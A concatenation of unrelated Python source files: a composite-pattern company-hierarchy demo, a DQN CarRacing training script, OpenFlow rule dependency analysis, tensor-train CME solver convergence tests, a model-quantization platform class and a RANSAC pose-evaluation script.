        """Leaf nodes accept no children; intentionally a no-op."""

    def remvoe(self, company):
        """Leaf nodes hold no children; intentionally a no-op
        (original spelling preserved)."""

    def display(self, depth):
        """Print this department at the given indentation depth."""
        print("-" * depth + self._name)

    def run_resp(self):
        """Perform the HR duty: recruiting, training and staff management."""
        print("%s: 员工招聘培训管理" % self._name)
class FianceCompany(Company):
    """Leaf node: finance department (original class-name spelling kept)."""

    def __init__(self, name):
        """Initialise the department with its name."""
        Company.__init__(self, name)

    def add(self, company):
        """Leaf nodes accept no children; intentionally a no-op."""

    def remvoe(self, company):
        """Leaf nodes hold no children; intentionally a no-op
        (original spelling preserved)."""

    def display(self, depth):
        """Print this department at the given indentation depth."""
        print("-" * depth + self._name)

    def run_resp(self):
        """Perform the finance duty: company financial settlement."""
        print("%s: 公司财务结算" % self._name)
class Client(object):
    """Demo driver that assembles and exercises a company tree."""

    def test(self):
        """Build headquarters with two regional branches, then print the
        hierarchy and execute every node's duty."""
        root = ConcreteCompany("北京总公司")
        root.add(HRCompany("总公司人力资源部"))
        root.add(FianceCompany("总公司财务部"))

        east_branch = ConcreteCompany("华东分公司")
        east_branch.add(HRCompany("华东公司人力资源部"))
        east_branch.add(FianceCompany("华东公司财务部"))
        root.add(east_branch)

        nanjing_branch = ConcreteCompany("南京分公司")
        nanjing_branch.add(HRCompany("南京公司人力资源部"))
        nanjing_branch.add(FianceCompany("南京公司财务部"))
        root.add(nanjing_branch)

        root.display(1)
        root.run_resp()
if __name__ == '__main__':
cls = Client()
cls.test()
|
<reponame>ParsaVahidi/Deep-Reinforcent-Learning-for-openAI-car-racing-game
# This code is originated from https://github.com/andywu0913/OpenAI-GYM-CarRacing-DQN
import os
import sys
import argparse
import gym
import DQNAgent
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from datetime import datetime
from collections import deque
from DQNAgent import CarRacingDQNAgent
RENDER = True                       # render the environment window while training
STARTING_EPISODE = 1
ENDING_EPISODE = 501  # 1000
SKIP_FRAMES = 2                     # each chosen action is repeated SKIP_FRAMES+1 env steps
TRAINING_BATCH_SIZE = 64            # replay minibatch size
SAVE_TRAINING_FREQUENCY = 50        # save the model every N episodes
UPDATE_TARGET_MODEL_FREQUENCY = 5   # sync the target network every N episodes
if __name__ == '__main__':
    # Output directory is timestamped so repeated runs do not overwrite each other.
    main_path = sys.path[0]
    date_now = datetime.now()
    date_str = date_now.strftime("%d_%m_%H_%M")
    save_folder = os.path.join(main_path, 'save', date_str)
    parser = argparse.ArgumentParser(description='Training a DQN agent to play CarRacing.')
    parser.add_argument('-m', '--model', help='Specify the last trained model path if you want to continue training after it.')
    parser.add_argument('-p', '--epsilon', type=float, default=1.0, help='The starting epsilon of the agent, default to 1.0.')
    args = parser.parse_args()
    env = gym.make('CarRacing-v0')  # original environment
    agent = CarRacingDQNAgent(epsilon=args.epsilon)
    if args.model:
        agent.load(args.model)
    total_reward_list = []  # shaped (adjusted) reward per episode
    real_reward_list = []   # raw environment reward per episode
    for e in range(STARTING_EPISODE, ENDING_EPISODE+1):
        print('Episode #{}'.format(e))
        init_state = env.reset()
        init_state = agent.process_state_image(init_state)
        total_reward = 0
        real_reward = 0
        negative_reward_counter = 0
        # Fixed-length queue of the most recent processed frames fed to the net.
        state_frame_stack_queue = deque([init_state]*agent.frame_stack_num, maxlen=agent.frame_stack_num)
        time_frame_counter = 1
        done = False
        while True:
            if RENDER:
                env.render()
            current_state_frame_stack = agent.generate_state_from_queue(state_frame_stack_queue)
            action = agent.act(current_state_frame_stack)
            # print('Action to apply: {}'.format(action))
            # Frame skipping: apply the same action for SKIP_FRAMES+1 steps,
            # accumulating the reward over the skipped frames.
            reward = 0
            for _ in range(SKIP_FRAMES+1):
                next_state, r, done, info = env.step(action)
                reward += r
                real_reward += r
                if done:
                    break
            # If continually getting negative reward 10 times after the tolerance steps, terminate this episode
            negative_reward_counter = negative_reward_counter + 1 if time_frame_counter > 100 and reward < 0 else 0
            # Extra bonus for the model if it uses full gas
            # (assumes action = [steer, gas, brake] — TODO confirm against DQNAgent)
            if action[1] == 1 and action[2] == 0:
                reward *= 1.5
            total_reward += reward
            next_state = agent.process_state_image(next_state)
            state_frame_stack_queue.append(next_state)
            next_state_frame_stack = agent.generate_state_from_queue(state_frame_stack_queue)
            agent.memorize(current_state_frame_stack, action, reward, next_state_frame_stack, done)
            # Terminate on env done, sustained negative reward, or negative total.
            if done or negative_reward_counter >= 25 or total_reward < 0:
                print('Episode: {}/{}, Time Frames: {}, Rewards: {:.2}, Rewards(adjusted): {:.2}, Epsilon: {:.2}'.format(
                    e, ENDING_EPISODE, time_frame_counter, float(real_reward), float(total_reward), float(agent.epsilon)))
                break
            if len(agent.memory) > TRAINING_BATCH_SIZE:
                agent.replay(TRAINING_BATCH_SIZE)
            time_frame_counter += 1
        if e % UPDATE_TARGET_MODEL_FREQUENCY == 0:
            agent.update_target_model()
        if e % SAVE_TRAINING_FREQUENCY == 0:
            if not os.path.isdir(save_folder):
                os.makedirs(save_folder)
            save_full_dir = '{}/episode_{}.h5'.format(save_folder, e)
            agent.save(save_full_dir)
        total_reward_list.append(total_reward)
        real_reward_list.append(real_reward)
    env.close()
    total_reward_arr = np.asarray(total_reward_list)
    real_reward_arr = np.asarray(real_reward_list)
    # Plotting the rewards: adjusted (top) and raw (bottom) per episode.
    fig_id = plt.figure(figsize=(12,9))
    ax = fig_id.add_subplot(211)
    ax.plot(total_reward_arr)
    ax.set_xlabel('Episodes')
    ax.set_ylabel('Reward (adjusted)')
    ax = fig_id.add_subplot(212)
    ax.plot(real_reward_arr)
    ax.set_xlabel('Episodes')
    ax.set_ylabel('Reward')
    plot_full_dir = '{}/rewards.png'.format(save_folder)
    plt.savefig(plot_full_dir)
<gh_stars>1-10
"""
Methods for calculating the direct and indirect dependencies of an
OpenFlow 1.3 ruleset.
Indirect dependencies refer to all rules which shadow or goto another, directly
or indirectly. This includes across multiple tables.
For consistency, by default all functions use the headerspace implementation.
Headerspace is faster for the intersection operation, which is all that indirect
dependencies need to check.
"""
# Copyright 2019 <NAME>, Wand Network Research Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
from .utils import AttachBDD
from .rule import Rule, UniqueRules
from .headerspace import wildcard_intersect
from .utils import nullcontext
from .cuddbdd import wc_to_BDD
def add_parents_hs(R, P, reaches):
    """Add headerspace dependency edges (R, Rj) for every parent Rj in P that
    R's packet-space intersects.

    If R is in the same table as the candidates, R's own match is used;
    otherwise the egress space of R's goto is intersected with the parents.
    """
    same_table = bool(P) and R.table == next(iter(P)).table
    wc = R.match.get_wildcard() if same_table else R.get_goto_egress().get_wildcard()
    reaches.update(
        (R, Rj) for Rj in P if wildcard_intersect(wc, Rj.match.get_wildcard())
    )
def add_parents_bdd(R, P, reaches, parent_to_edge=None):
    """Map all dependencies direct or indirect, using BDD intersection.

    Adds (R, Rj) to reaches for every parent Rj whose packet-space overlaps
    R's; optionally also records the reverse mapping in parent_to_edge.
    """
    same_table = bool(P) and R.table == next(iter(P)).table
    packets = (R.as_BDD if same_table
               else wc_to_BDD(R.get_goto_egress().get_wildcard(), "1", "1"))
    for Rj in P:
        if not packets.intersection(Rj.as_BDD):
            continue
        reaches.add((R, Rj))
        if parent_to_edge is not None:
            parent_to_edge[Rj].add(R)
def build_table_deps(ruleset, use_bdd=False):
    """Builds the dependencies within a table (direct and indirect)

    Loosely based on CacheFlow (2016), algorithm 1

    ruleset: Takes a list of Rule objects
    use_bdd: Defaults to False
    return: A mapping from edges to packet-space on that path.
            An edge is a tuple (child, parent) and add_parents selects the
            packet-space encoding.
    """
    # Select the packet-space encoding and its matching context manager once.
    add_parents = add_parents_bdd if use_bdd else add_parents_hs
    attach = AttachBDD if use_bdd else nullcontext
    edges = set()
    with attach(ruleset):
        for rule in ruleset:
            # A rule can depend on any lower-priority rule in its table, or
            # any rule in a later table.
            candidates = [other for other in ruleset
                          if other.priority < rule.priority or other.table > rule.table]
            add_parents(rule, candidates, edges)
    return edges
def build_prefix_table_deps(ruleset):
    """Finds all direct and indirect dependencies of a prefix table

    Requires a single IPv4 prefix table as input
    Requires a ruleset with a default rule at priority 0.
    Assumes that rules are in the correct format.

    Internally uses headerspace wildcards for calculations as intersection
    is faster than BDDs and this saves an extra conversion step.

    ruleset: A list of Rule objects, must be a single IPv4 prefix table
    return: A iterable list of (child, parent) dependencies
    """
    # Sort subnets from 0.0.0.0 -> 255.255.255.255 then if required /0 -> /32
    ruleset = sorted(ruleset,
                     key=lambda x: (x.match["IPV4_DST"][0], x.priority))
    reaches = list()
    # The priority-0 rule must be the catch-all default (matches everything).
    assert ruleset[0].priority == 0
    assert ruleset[0].match.get_wildcard() == Rule().match.get_wildcard()
    # Add the default rule to the bottom of the chain
    # `chain` is a stack of prefixes that enclose the current rule, most
    # specific on top, with the default rule always at the bottom.
    chain = [ruleset[0]]
    for rule in ruleset[1:]:
        # As rules are ordered, once we stop overlapping a rule we know
        # no subsequent rules will. So pop that.
        while not wildcard_intersect(chain[-1].match.get_wildcard(),
                                     rule.match.get_wildcard()):
            chain.pop()
        # We can only overlap with one rule and will do so completely
        # (prefixes either nest or are disjoint), so every remaining chain
        # entry is an ancestor of this rule.
        for c_rule in chain:
            reaches.append((rule, c_rule))
        chain.append(rule)
    return reaches
def _recurse_goto_deps(tables, table, match, parents, edges):
    """Walk goto-table chains, adding (ancestor, rule) edges for every rule
    reachable from the chain of `parents`.

    tables: mapping of table id -> list of Rules in that table
    table: the table currently being expanded
    match: the egress packet-space reaching this table (None for the root)
    parents: tuple of rules traversed so far
    edges: set collecting (parent, rule) dependency pairs
    """
    for rule in tables[table]:
        next_table = rule.instructions.goto_table
        if next_table is None:
            # Terminal rule: only keep it if the incoming packet-space
            # actually reaches it (root call has match=None, keep all).
            if (match is not None and
                    not wildcard_intersect(match.get_wildcard(),
                                           rule.match.get_wildcard())):
                continue
        else:
            try:
                egress = rule.get_goto_egress(match)
            except Exception:
                # No packets can traverse this goto; prune the branch.
                continue
        for parent in parents:
            edges.add((parent, rule))
        if next_table:
            # Gotos must move forward; `egress` is always bound here because
            # this branch implies the `else` above ran for this rule.
            assert rule.instructions.goto_table > table
            _recurse_goto_deps(tables, next_table, egress, parents + (rule,), edges)
def build_ruleset_deps(ruleset, build_table=build_table_deps,
                       use_bdd=None):
    """Build the dependencies for a multi-table ruleset

    ruleset: Takes a list of Rule objects
    build_table: Algorithm within a table, build_table_deps by default
    use_bdd: If not None, forwarded to build_table (and enables BDD
             attachment when truthy)
    returns: A list of dependency pairs in the format
             [(f1, f2), (f1, f3), ...]
    """
    edges = set()
    _AttachBDD = AttachBDD if use_bdd else nullcontext
    with UniqueRules(), _AttachBDD(ruleset):
        # Group rules by table id.
        ruleset_tables = defaultdict(list)
        for rule in ruleset:
            ruleset_tables[rule.table].append(rule)
        # Cross-table (goto) dependencies.
        for table in ruleset_tables:
            _recurse_goto_deps(ruleset_tables, table, None, tuple(), edges)
        # Intra-table dependencies.
        for table in ruleset_tables.values():
            if use_bdd is not None:
                edges.update(build_table(table, use_bdd=use_bdd))
            else:
                edges.update(build_table(table))
    return list(edges)
|
<filename>code/simplegene_tt_convergence.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 9 10:01:49 2020
@author: ion
"""
import tensorflow as tf
import t3f
import numpy as np
import matplotlib.pyplot as plt
from CME import CME
import timeit
import scipy.integrate
import numba
import scipy.sparse
from tt_extra import mat_to_tt
import tt
import tt.amen
from ttInt import ttInt
# define reaction
# Two-species gene-expression model: 4 reactions with stoichiometry Pre/Post
# and mass-action-style propensities Props (third one is constitutive).
rates = np.array([0.015, 0.002, 0.1, 0.01])
Pre = np.array([[1, 0], [1, 0], [0, 0], [0, 1]])
Post = np.array([[1, 1], [0, 0], [1, 0], [0, 0]])
Props = [lambda x: x[:, 0], lambda x: x[:, 0], lambda x: x[:, 0]*0+1, lambda x: x[:, 1]]
# construct the model and the CME operator
N = [80, 120]  # state truncation
mdl = CME(N, Pre, Post, rates, Props)
mdl.construct_generator2(to_tf=False)
A_tt = mdl.construct_generator_tt()  # CME generator in tensor-train format
# Initial condition: a point mass at state (2, 4).
Initial = [2, 4]
P0 = np.zeros(N)
P0[Initial[0], Initial[1]] = 1.0
P0_tt = tt.tensor(P0)
dT = 128   # length of one solve interval [s]
Nt = 8     # number of intervals
time = np.arange(Nt+1) * dT
# Reference solution
print('Reference solution...')
tme_ode45 = timeit.time.time()
mdl.construct_generator2(to_tf=False)
Gen = mdl.gen


def func(t, y):
    # Right-hand side of the CME ODE dP/dt = Gen @ P.
    return Gen.dot(y)


# solve CME with a tight max step to get a high-accuracy dense reference
res = scipy.integrate.solve_ivp(func, [0, time[-1]], P0.flatten(), t_eval=time, max_step=dT/10000)
Pt = res.y.reshape(N+[-1])
P_ref = Pt[:, :, -1]  # reference distribution at the final time
tme_ode45 = timeit.time.time() - tme_ode45
def _final_error(integrator, round_tol=None):
    """Propagate P0_tt over all Nt intervals with *integrator* and return the
    max relative error against the ODE reference P_ref.

    :param integrator: a configured ttInt time integrator
    :param round_tol: if given, TT-round the solution to this tolerance after
        every interval (used by the spectral collocation methods)
    """
    P_tt = P0_tt
    for _ in range(Nt):
        P_tt = integrator.solve(P_tt, dT, intervals=1)
        if round_tol is not None:
            P_tt = P_tt.round(round_tol)
    P = P_tt.full().reshape(N)
    return np.max(np.abs(P - P_ref)) / np.max(np.abs(P_ref))


# convergence test: error vs number of time steps, implicit Euler
print('Implicit Euler...')
err_implicit = []
refinements_implicit = [16, 32, 64, 128, 256, 512]
for nt in refinements_implicit:
    err = _final_error(ttInt(A_tt, epsilon=1e-9, N_max=nt, dt_max=100.0))
    err_implicit.append(err)
    print('nt ', nt, ' error inf ', err)

# convergence test: error vs number of time steps, Crank-Nicolson
print('<NAME>...')
err_cn = []
refinements_cn = [16, 32, 64, 128, 256, 512]
for nt in refinements_cn:
    err = _final_error(ttInt(A_tt, epsilon=1e-11, N_max=nt, dt_max=100.0,
                             method='crank–nicolson'))
    err_cn.append(err)
    print('nt ', nt, ' error inf ', err)

# convergence test: error vs collocation order, Chebyshev
print('Cheby...')
err_ch = []
refinements_ch = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 28, 32]
for nt in refinements_ch:
    err = _final_error(ttInt(A_tt, epsilon=1e-14, N_max=nt, dt_max=1000.0,
                             method='cheby'), round_tol=1e-14)
    err_ch.append(err)
    print('nt ', nt, ' error inf ', err)

# convergence test: error vs collocation order, Legendre
print('Legendre...')
err_le = []
refinements_le = [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 28, 32]
for nt in refinements_le:
    err = _final_error(ttInt(A_tt, epsilon=1e-14, N_max=nt, dt_max=1000.0,
                             method='legendre'), round_tol=1e-14)
    err_le.append(err)
    print('nt ', nt, ' error inf ', err)

# convergence test: error vs solver tolerance at fixed order
print('Epsilon of the solver...')
err_eps = []
refinements_epsilon = 10.0 ** (-np.arange(1, 11))
for eps in refinements_epsilon:
    err = _final_error(ttInt(A_tt, epsilon=eps, N_max=16, dt_max=1000.0,
                             method='cheby'))
    err_eps.append(err)
    print('epsilon ', eps, ' error inf ', err)

# joint sweep: error vs (tolerance, order)
print('Epsilon vs Nt ...')
refinements_epsilon_2 = 10.0 ** (-np.arange(1, 13))
refinements_ch2 = [2, 3, 4, 5, 6, 7, 8]
err_eps_ch = []
for eps in refinements_epsilon_2:
    err_temp = []
    for nt in refinements_ch2:
        err = _final_error(ttInt(A_tt, epsilon=eps, N_max=nt, dt_max=1000.0,
                                 method='cheby'))
        err_temp.append(err)
        print('epsilon ', eps, ' nt ', nt, ' error inf ', err)
    err_eps_ch.append(err_temp)
#%% plots
import tikzplotlib

# Error vs number of time steps / collocation order for the three methods.
plt.figure()
plt.loglog(refinements_implicit, err_implicit)
plt.loglog(refinements_cn[:-1], err_cn[:-1])
plt.loglog(refinements_ch[:], err_ch[:])
# plt.loglog(refinements_le[:],err_le[:])
plt.xlabel(r'$N_t$')
plt.ylabel(r'max relative error')
plt.grid()
plt.legend(['Implicit Euler', 'Crank-Nicolson', 'Chebyshev'])
tikzplotlib.save('convergence_Nt.tex')

# plt.figure()
# plt.loglog(dT/np.array(refinements_implicit),np.array(err_implicit))
# plt.loglog(dT/np.array(refinements_cn)[:-1],np.array(err_cn)[:-1])
# plt.xlabel(r'$\Delta t$ [s]')
# plt.ylabel(r'max relative error')
# plt.grid()
# plt.legend(['Implicit Euler','Crank-Nicolson'])
# tikzplotlib.save('convergence_dt.tex')

# Error vs solver tolerance at fixed order.
plt.figure()
plt.loglog(refinements_epsilon, err_eps)
plt.xlabel(r'$\epsilon$')
plt.ylabel(r'max relative error')
plt.grid()
tikzplotlib.save('convergence_eps.tex')

# Joint sweep: one curve per tolerance, plotted against step size.
plt.figure()
plt.loglog(dT/np.array(refinements_ch2), np.array(err_eps_ch).transpose())
plt.xlabel(r'$\Delta t$ [s]')
plt.ylabel(r'max relative error')
plt.legend([r'$\epsilon=$'+str(eps) for eps in refinements_epsilon_2])
plt.grid()
tikzplotlib.save('convergence_eps_multiple.tex')

# Joint sweep transposed: one curve per order, against tolerance.
plt.figure()
plt.loglog(np.array(refinements_epsilon_2), np.array(err_eps_ch))
plt.xlabel(r'$\epsilon$')
plt.ylabel(r'max relative error')
plt.legend([r'$T=$'+str(tmp)+'' for tmp in np.array(refinements_ch2)])
plt.grid()
tikzplotlib.save('convergence_Nt_multiple.tex')
# Copyright 2022 Sony Semiconductors Israel, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import pprint
from typing import Any, Dict
from model_compression_toolkit.common.target_platform.current_tp_model import _current_tp_model, \
get_current_tp_model
from model_compression_toolkit.common.target_platform.fusing import Fusing
from model_compression_toolkit.common.target_platform.target_platform_model_component import \
TargetPlatformModelComponent
from model_compression_toolkit.common.target_platform.op_quantization_config import OpQuantizationConfig, \
QuantizationConfigOptions
from model_compression_toolkit.common.target_platform.operators import OperatorsSetBase
from model_compression_toolkit.common.immutable import ImmutableClass
from model_compression_toolkit.common.logger import Logger
def get_default_quantization_config_options() -> QuantizationConfigOptions:
    """
    Returns: The default QuantizationConfigOptions of the currently-active
    TargetPlatformModel. This is the options to use when a layer's options is
    queried and it wasn't specified in the TargetPlatformCapabilities.
    The default QuantizationConfigOptions always contains a single option.
    """
    return get_current_tp_model().default_qco
def get_default_quantization_config() -> OpQuantizationConfig:
    """
    Returns: The default OpQuantizationConfig of the currently-active
    TargetPlatformModel. This is the OpQuantizationConfig to use when a
    layer's options is queried and it wasn't specified in the
    TargetPlatformCapabilities. This OpQuantizationConfig is the single
    option in the default QuantizationConfigOptions.
    """
    return get_current_tp_model().get_default_op_quantization_config()
class TargetPlatformModel(ImmutableClass):
    """
    Modeling of the hardware the quantized model will use during inference.
    The model contains definition of operators, quantization configurations of them, and
    fusing patterns so that multiple operators will be combined into a single operator.
    """

    def __init__(self,
                 default_qco: QuantizationConfigOptions,
                 name="default_tp_model"):
        """
        Args:
            default_qco (QuantizationConfigOptions): Default QuantizationConfigOptions to use for operators that their QuantizationConfigOptions are not defined in the model.
            name (str): Name of the model.
        """
        super().__init__()
        self.name = name
        self.operator_set = []  # OperatorsSetBase instances attached via append_component
        assert isinstance(default_qco, QuantizationConfigOptions)
        assert len(default_qco.quantization_config_list) == 1, \
            'Default QuantizationConfigOptions must contain only one option'
        self.default_qco = default_qco
        self.fusing_patterns = []  # Fusing instances attached via append_component

    def get_config_options_by_operators_set(self,
                                            operators_set_name: str) -> QuantizationConfigOptions:
        """
        Get the QuantizationConfigOptions of a OperatorsSet by the OperatorsSet name.
        If the name is not in the model, the default QuantizationConfigOptions is returned.

        Args:
            operators_set_name: Name of OperatorsSet to get.

        Returns:
            QuantizationConfigOptions to use for ops in OperatorsSet named operators_set_name.
        """
        for op_set in self.operator_set:
            if operators_set_name == op_set.name:
                return op_set.qc_options
        return get_default_quantization_config_options()

    def get_default_op_quantization_config(self) -> OpQuantizationConfig:
        """
        Returns: The default OpQuantizationConfig of the TargetPlatformModel.
        """
        # Fixed: the original assertion message reported the count from the
        # *globally current* model (get_current_tp_model()), which may differ
        # from self; report this model's own count instead.
        assert len(self.default_qco.quantization_config_list) == 1, \
            'Default quantization configuration options must contain only one option,' \
            f' but found {len(self.default_qco.quantization_config_list)} configurations.'
        return self.default_qco.quantization_config_list[0]

    def is_opset_in_model(self,
                          opset_name: str) -> bool:
        """
        Check whether an operators set is defined in the model or not.

        Args:
            opset_name: Operators set name to check.

        Returns:
            Whether an operators set is defined in the model or not.
        """
        return opset_name in [x.name for x in self.operator_set]

    def get_opset_by_name(self,
                          opset_name: str) -> OperatorsSetBase:
        """
        Get an OperatorsSet object from the model by its name.
        If name is not in the model - None is returned.

        Args:
            opset_name: OperatorsSet name to retrieve.

        Returns:
            OperatorsSet object with the name opset_name, or None if opset_name is not in the model.
        """
        opset_list = [x for x in self.operator_set if x.name == opset_name]
        assert len(opset_list) <= 1, f'Found more than one OperatorsSet in' \
                                     f' TargetPlatformModel with the name {opset_name}. ' \
                                     f'OperatorsSet name must be unique.'
        if len(opset_list) == 0:  # opset_name is not in the model.
            return None
        return opset_list[0]  # There's one opset with that name

    def append_component(self,
                         tp_model_component: TargetPlatformModelComponent):
        """
        Attach a TargetPlatformModel component to the model. Components can be for example:
        Fusing, OperatorsSet, etc.

        Args:
            tp_model_component: Component to attach to the model.

        Raises:
            Exception: If the component type is not recognized.
        """
        if isinstance(tp_model_component, Fusing):
            self.fusing_patterns.append(tp_model_component)
        elif isinstance(tp_model_component, OperatorsSetBase):
            self.operator_set.append(tp_model_component)
        else:
            raise Exception(f'Trying to append an unfamiliar TargetPlatformModelComponent of type: {type(tp_model_component)}')

    def __enter__(self):
        """
        Start defining the TargetPlatformModel using 'with'.

        Returns: Initialized TargetPlatformModel object.
        """
        _current_tp_model.set(self)
        return self

    def __exit__(self, exc_type, exc_value, tb):
        """
        Finish defining the TargetPlatformModel at the end of the 'with' clause.
        Returns the final and immutable TargetPlatformModel instance.
        """
        if exc_value is not None:
            # Surface the error raised inside the 'with' body before re-raising.
            print(exc_value, exc_value.args)
            raise exc_value
        self.__validate_model()  # Assert that model is valid.
        _current_tp_model.reset()
        self.initialized_done()  # Make model immutable.
        return self

    def __validate_model(self):
        """
        Assert model is valid.
        Model is invalid if, for example, it contains multiple operator sets with the same name,
        as their names should be unique.
        """
        opsets_names = [op.name for op in self.operator_set]
        if len(set(opsets_names)) != len(opsets_names):
            Logger.error('OperatorsSet must have unique names')

    def get_default_config(self) -> OpQuantizationConfig:
        """
        Returns: The default OpQuantizationConfig of the TargetPlatformModel.

        Kept for backward compatibility; delegates to
        get_default_op_quantization_config (the original duplicated its body).
        """
        return self.get_default_op_quantization_config()

    def get_info(self) -> Dict[str, Any]:
        """
        Returns: Dictionary that summarizes the TargetPlatformModel properties (for display purposes).
        """
        return {"Model name": self.name,
                "Default quantization config": self.get_default_config().get_info(),
                "Operators sets": [o.get_info() for o in self.operator_set],
                "Fusing patterns": [f.get_info() for f in self.fusing_patterns]
                }

    def show(self):
        """
        Display the TargetPlatformModel.
        """
        pprint.pprint(self.get_info(), sort_dicts=False)
|
<reponame>hosang/ransac-tutorial-2020-data
# select the data
import numpy as np
import matplotlib.pyplot as plt
import h5py
import cv2
from utils import *
from tqdm import tqdm
import os
from metrics import *
import argparse
def evaluate_results(IN_DIR, seq, models, inliers, method=None):
    """Compute per-pair angular pose errors for one sequence.

    Args:
        IN_DIR: root directory of the split (one sub-folder per sequence).
        seq: sequence name.
        models: dict mapping pair-key -> estimated fundamental matrix (or None).
        inliers: dict mapping pair-key -> inlier mask, or (for the OANet
            loaders) the actual Nx4 inlier correspondences.
        method: method name controlling how `inliers` is interpreted; defaults
            to the module-level CLI value `args.method` for backward
            compatibility.

    Returns:
        dict mapping pair-key -> max angular error (from R/t recovered via the
        essential matrix); 3.14 when no model was estimated.
    """
    if method is None:
        # NOTE(review): preserves the original reliance on the module-level
        # `args`; confirm `args` exists when calling without an explicit method.
        method = args.method
    ang_errors = {}
    matches = load_h5(f'{IN_DIR}/{seq}/matches.h5')
    K1_K2 = load_h5(f'{IN_DIR}/{seq}/K1_K2.h5')
    R = load_h5(f'{IN_DIR}/{seq}/R.h5')
    T = load_h5(f'{IN_DIR}/{seq}/T.h5')
    F_pred, inl_mask = models, inliers
    for k, m in tqdm(matches.items()):
        if F_pred[k] is None:
            ang_errors[k] = 3.14  # no model estimated: assign ~pi error
            continue
        img_id1 = k.split('-')[0]
        img_id2 = k.split('-')[1]
        K1 = K1_K2[k][0][0]
        K2 = K1_K2[k][0][1]
        try:
            E_cv_from_F = get_E_from_F(F_pred[k], K1, K2)
        except Exception:
            # BUG FIX: the original assigned the fallback to an unused name `E`,
            # leaving E_cv_from_F unbound on the first failure (NameError) or
            # stale from the previous pair afterwards.
            print("Fail")
            E_cv_from_F = np.eye(3)
        R1 = R[img_id1]
        R2 = R[img_id2]
        T1 = T[img_id1]
        T2 = T[img_id2]
        # Relative pose from ground-truth absolute poses.
        dR = np.dot(R2, R1.T)
        dT = T2 - np.dot(dR, T1)
        if method.lower() in ('load_oanet', 'load_oanet_degensac'):
            # They provided not the mask, but actual correspondences.
            pts1 = inl_mask[k][:, :2]  # coordinates in image 1
            pts2 = inl_mask[k][:, 2:]  # coordinates in image 2
        else:
            pts1 = m[inl_mask[k], :2]  # coordinates in image 1
            pts2 = m[inl_mask[k], 2:]  # coordinates in image 2
        p1n = normalize_keypoints(pts1, K1)
        p2n = normalize_keypoints(pts2, K2)
        ang_errors[k] = max(eval_essential_matrix(p1n, p2n, E_cv_from_F, dR, dT))
    return ang_errors
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--split",
        default='val',
        type=str,
        help='split to run on. Can be val or test')
    parser.add_argument(
        "--method", default='cv2F', type=str,
        help=' can be cv2f, pyransac, degensac, sklearn' )
    parser.add_argument(
        "--inlier_th",
        default=0.75,
        type=float,
        help='inlier threshold. Default is 0.75')
    parser.add_argument(
        "--conf",
        default=0.999,
        type=float,
        help='confidence Default is 0.999')
    parser.add_argument(
        "--maxiter",
        default=100000,
        type=int,
        help='max iter Default is 100000')
    parser.add_argument(
        "--match_th",
        default=0.85,
        type=float,
        help='match filetring th. Default is 0.85')
    parser.add_argument(
        "--force",
        default=False,
        type=bool,
        help='Force recompute if exists')
    parser.add_argument(
        "--data_dir",
        default='f_data',
        type=str,
        help='path to the data')
    args = parser.parse_args()
    # Validate CLI choices before doing any work.
    if args.split not in ['val', 'test']:
        raise ValueError('Unknown value for --split')
    if args.method.lower() not in ['cv2f', 'kornia', 'cv2eimg', 'load_oanet', 'load_oanet_degensac', 'pyransac', 'load_dfe', 'nmnet2', 'degensac', 'sklearn', 'cne', 'acne']:
        raise ValueError('Unknown value for --method')
    # Stochastic methods are averaged over 3 runs on the test split;
    # deterministic "load_*" / learned methods always use a single run.
    NUM_RUNS = 1
    if args.split == 'test':
        NUM_RUNS = 3
    if args.method.lower() in ['load_oanet', 'load_oanet_degensac', 'load_dfe', 'nmnet2', 'cne', 'acne']:
        NUM_RUNS = 1
    params = {"maxiter": args.maxiter,
              "inl_th": args.inlier_th,
              "conf": args.conf,
              "match_th": args.match_th
              }
    problem = 'f'  # fundamental-matrix estimation problem
    OUT_DIR = get_output_dir(problem, args.split, args.method, params)
    IN_DIR = os.path.join(args.data_dir, args.split)
    if not os.path.isdir(OUT_DIR):
        os.makedirs(OUT_DIR)
    # NOTE(review): num_cores is computed but not used below — confirm intent.
    num_cores = int(len(os.sched_getaffinity(0)) * 0.9)
    all_maas = []
    for run in range(NUM_RUNS):
        seqs = os.listdir(IN_DIR)
        for seq in seqs:
            print (f'Working on {seq}')
            in_models_fname = os.path.join(OUT_DIR, f'submission_models_seq_{seq}_run_{run}.h5')
            in_inliers_fname = os.path.join(OUT_DIR, f'submission_inliers_seq_{seq}_run_{run}.h5')
            out_errors_fname = os.path.join(OUT_DIR, f'errors_seq_{seq}_run_{run}.h5')
            out_maa_fname = os.path.join(OUT_DIR, f'maa_seq_{seq}_run_{run}.h5')
            if not os.path.isfile(in_models_fname) or not os.path.isfile(in_inliers_fname):
                print (f"Submission file {in_inliers_fname} is missing, cannot evaluate, skipping")
                continue
            models = load_h5(in_models_fname)
            inlier_masks = load_h5(in_inliers_fname)
            # Reuse previously computed errors unless --force is set.
            if os.path.isfile(out_errors_fname) and not args.force:
                print (f"Submission file {in_inliers_fname} exists, read it")
                error = load_h5(out_errors_fname)
            else:
                error = evaluate_results(IN_DIR, seq, models, inlier_masks)
                save_h5(error, out_errors_fname)
            mAA = calc_mAA_FE({seq: error})
            print (f" mAA {seq} = {mAA[seq]:.5f}")
            save_h5({"mAA": mAA[seq]}, out_maa_fname)
            all_maas.append(mAA[seq])
    # Final score: mean mAA over all sequences and runs.
    out_maa_final_fname = os.path.join(OUT_DIR, f'maa_FINAL.h5')
    final_mAA = (np.array(all_maas)).mean()
